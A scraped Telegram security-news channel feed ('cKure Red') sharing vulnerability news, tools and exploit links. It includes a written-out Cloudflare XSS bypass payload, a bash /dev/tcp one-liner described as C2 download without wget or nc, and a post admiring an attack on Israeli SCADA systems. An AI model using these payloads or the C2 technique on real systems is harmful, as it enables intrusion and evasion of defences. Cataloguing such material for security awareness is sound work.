cKure Red

🆕 EXIF Stripper: A web based image-metadata remover utility. https://ckure.esy.es/rx/tools/exif/ *Images are uploaded on a shared hosting server. This may be concerning even though there is a script that removes the pictures from server after regular intervals.…

🆕 JWT Breaker: A web based client-side JSON Web Token brute-forcing utility.

https://ckure.esy.es/rx/tools/jwt/

To generate tokens, use: https://ckure.esy.es/rx/tools/jwt/gen.php

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥2

2.06K views15:31

cKure Red

cKure Red pinned «🆕 JWT Breaker: A web based client-side JSON Web Token brute-forcing utility. https://ckure.esy.es/rx/tools/jwt/ To generate tokens, use: https://ckure.esy.es/rx/tools/jwt/gen.php»

15:31

cKure Red

🤍

Google Project Zero researcher uncovers Zero-Click Zero-Day exploit targeting Samsung devices.

CVE-2024-49415: Security flaw impacting Monkey's Audio (APE) decoder on Samsung smartphones that could lead to code execution.

Out-of-bounds write in libsaped.so prior to SMR Dec-2024 Release 1 allows remote attackers to execute arbitrary code.

https://security.samsungmobile.com/securityUpdate.smsb

The function saped_rec in libsaped.so writes to a dmabuf allocated by the C2 media service, which always appears to have size 0x120000.

https://project-zero.issues.chromium.org/issues/368695689

https://thehackernews.com/2025/01/google-project-zero-researcher-uncovers.html

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥2😁22

1.99K views10:08

cKure Red

🔼

baitroute: A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers.

https://github.com/utkusen/baitroute

https://utkusen.substack.com/p/how-to-create-vulnerable-looking

Please open Telegram to view this post

VIEW IN TELEGRAM

GitHub

GitHub - utkusen/baitroute: A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers

A web honeypot library to create vulnerable-looking endpoints to detect and mislead attackers - utkusen/baitroute

🔥3

2.3K views14:44

cKure Red

0:56

This media is not supported in your browser

VIEW IN TELEGRAM

📱

Scam by Apple as it created a plain-text protocol and said it protects user privacy.

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥2👍1🤔1🤣1

1.93K viewsedited 00:09

cKure Red

🔠

2️⃣

🔠

https://youtu.be/3GUMoGRRA2U

Please open Telegram to view this post

VIEW IN TELEGRAM

YouTube

The Patch Report for January 2025

#ThePatchReport #ZeroDayInitiative #0day
Welcome to the January 2025 edition of the Patch Report - our brief look into the latest security updates from Microsoft, Adobe, and beyond. It's a small release from Adobe, but it's the largest patch Tuesday in Microsoft's…

1.87K views12:38

cKure Red

🇵🇸

Wiz Research Uncovers Exposed DeepSeek Database Leaking Sensitive Information, Including Chat History.

https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak

Please open Telegram to view this post

VIEW IN TELEGRAM

wiz.io

Wiz Research Uncovers Exposed DeepSeek Database Leaking Sensitive Information, Including Chat History | Wiz Blog

A publicly accessible database belonging to DeepSeek allowed full control over database operations, including the ability to access internal data. The exposure includes over a million lines of log streams with highly sensitive information.

🔥2🥱1

2.02K views05:48

cKure Red

0:30

This media is not supported in your browser

VIEW IN TELEGRAM

💀

Iran 🇮🇷 based hacker group successfully compromised SCADA systems in Israel 🇮🇱 amid a prolific Cyber-Attack. The group (Handala Hack) shared this video, showing the desperation of the operator who could not get his systems working.

The CCTV footage and other documents were also exfilterated during the Cyber-Attack.

Victim organisation: Tosaf, Israel

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥7👏1😁1

2.77K viewsedited 07:16

cKure Red

Alleged Cloudflare XSS protection bypass: ⚔️

"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>

𝕏 | 0x0SojalSec

🤔2

2.24K views17:18

cKure Red

😒

Two zero-day vulnerabilities exist in the latest version of Thingworx ICS-SCADA Web based software platform for IoT devices as a CMS.

Researcher: M-Shameem

Please open Telegram to view this post

VIEW IN TELEGRAM

1.93K views21:17

cKure Red

cKure Red pinned «😒 Two zero-day vulnerabilities exist in the latest version of Thingworx ICS-SCADA Web based software platform for IoT devices as a CMS. Researcher: M-Shameem»

21:17

cKure Red

💻

Zero-Day (patched): Safari 1-Day RCE Exploit (WebKit-Bug-256172).

https://github.com/wh1te4ever/WebKit-Bug-256172

Please open Telegram to view this post

VIEW IN TELEGRAM

GitHub

GitHub - wh1te4ever/WebKit-Bug-256172: Safari 1day RCE Exploit

Safari 1day RCE Exploit. Contribute to wh1te4ever/WebKit-Bug-256172 development by creating an account on GitHub.

🔥11

1.88K views16:28

cKure Red

💻

First analysis of Apple's USB Restricted Mode bypass (CVE-2025-24200).

https://blog.quarkslab.com/first-analysis-of-apples-usb-restricted-mode-bypass-cve-2025-24200.html

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥11

1.75K views07:53

cKure Red

🐧

The Art of Linux Kernel Rootkits.

https://inferi.club/post/the-art-of-linux-kernel-rootkits

Please open Telegram to view this post

VIEW IN TELEGRAM

inferi.club

The Art of Linux Kernel Rootkits

An advanced and deep introduction about Linux kernel mode rookits, how to detect, what are hooks and how it works.

👍2

2.62K views18:04

cKure Red

💎 Sandbox evasions are a strange world: a tiny mouse jitter can decide the fate of a whole attack chain. CPR describes statistical attacks they launched on sandbox human interaction modules, then gives full mitigation, including exposition and source code.

Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions.

https://research.checkpoint.com/2025/the-cat-and-mouse-game-exploiting-statistical-weaknesses-in-human-interaction-anti-evasions/

Please open Telegram to view this post

VIEW IN TELEGRAM

Check Point Research

The Cat and Mouse Game: Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions - Check Point Research

Executive Summary Why We Care about Sandbox Emulation As a discipline, information security involves a vast web of entry vectors, mitigations, and counter-mitigations. Among these, one of the most impactful points of conflict between attackers and defenders…

1.83K views17:11

cKure Red

5️⃣

1 liner bash for C2 without using any native program like wget, nc etc, esp containers.

bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'

Source: Linkedin | Harvey Spec

Please open Telegram to view this post

VIEW IN TELEGRAM

👎5

2.09K viewsedited 08:18

cKure Red

1:09

This media is not supported in your browser

VIEW IN TELEGRAM

Dangerous AI communication.

GibberLink mode.

Source: https://www.linkedin.com/in/georgi-gerganov-b230ab24

🤣4

1.96K views06:31

cKure Red

Bybit_Incident_Investigation_-_Preliminary_Report.pdf

3 MB

Bybit_Interim_Investigation_Report.pdf

679.2 KB

1.86K views06:52

cKure Red

🇰🇵

Bybit hack technical analysis of the Hack by Lazarus group, North Korean state spinsored hacking group (as calimed by the FBI, United States 🇺🇸).

Please open Telegram to view this post

VIEW IN TELEGRAM

🤩1

1.99K viewsedited 06:53

cKure Red

🎁

Hiding Shellcode in Image Files with Python and C/C++

https://github.com/WafflesExploits/hide-payload-in-images

Please open Telegram to view this post

VIEW IN TELEGRAM

GitHub

GitHub - andrecrafts/hide-payload-in-images: A project that demonstrates embedding shellcode payloads into image files (like PNGs)…

A project that demonstrates embedding shellcode payloads into image files (like PNGs) using Python and extracting them using C/C++. Payloads can be retrieved directly from the file on disk or from ...

2.38K views14:55

About

Blog

Apps

Platform